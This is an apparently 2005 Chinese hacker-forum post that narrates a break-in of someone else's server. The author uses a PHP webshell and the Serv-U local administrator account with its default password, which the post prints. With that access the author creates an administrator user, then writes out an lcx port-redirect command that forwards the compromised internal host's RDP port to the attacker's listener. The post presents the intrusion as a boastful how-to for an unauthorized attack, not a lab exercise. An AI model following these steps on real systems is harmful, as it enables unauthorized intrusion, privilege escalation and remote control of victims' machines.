您现在的位置: 骇客基地 >> 黑客文章 >> 黑客攻防 >> 黑客教程 >> 正文

再次入侵内网服务器
骇客基地 阅读: 时间:2005-12-26 1:52:20 来源:www.hookbase.com
   老狼来也...今天真TMD郁闷.....不废话了......

不知道哪里搞了个php的webshell,然后就想提权试试...

这次入侵没有技术可言..就当复习好了......

服务器是NT的装了apache,好像这个51shell加密后的phpspy也有权限了

到它系统目录下面找到了my.ini.装了MYSQL的.然后用户是root密码是空.

然后用php马的执行SQL功能连接它数据库试试,结果失败了.

然后用这个php马自带的扫描工具扫描了一下.发下3306没开但是..

开了21.和43958.ftp上去发现是低版本的...然后..

这个phpspy已经有Serv-U EXP了....当然不用我上传ftp.exe了..

提权就不用说了...就是利用Serv-U的本地用户localadministrator和

它的默认密码#l@$ak#.lk;0@P然后就有administrator权限了....

直接建立了用户230 login in.成功了..但是3389连不上....

webshell里面ipconfig才发现它是内网服务器.......笨得我...............

然后呢..当然是lcx大哥的lcx.exe了........哈哈.......端口重定向............

上传上去lcx -slave 我的IP 监听的端口 肉鸡IP 3389

这个命令就是把肉鸡的3389端口定向到我监听的端口..

今天广告
参与评论:
注意事项:
【再次入侵内网服务器】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号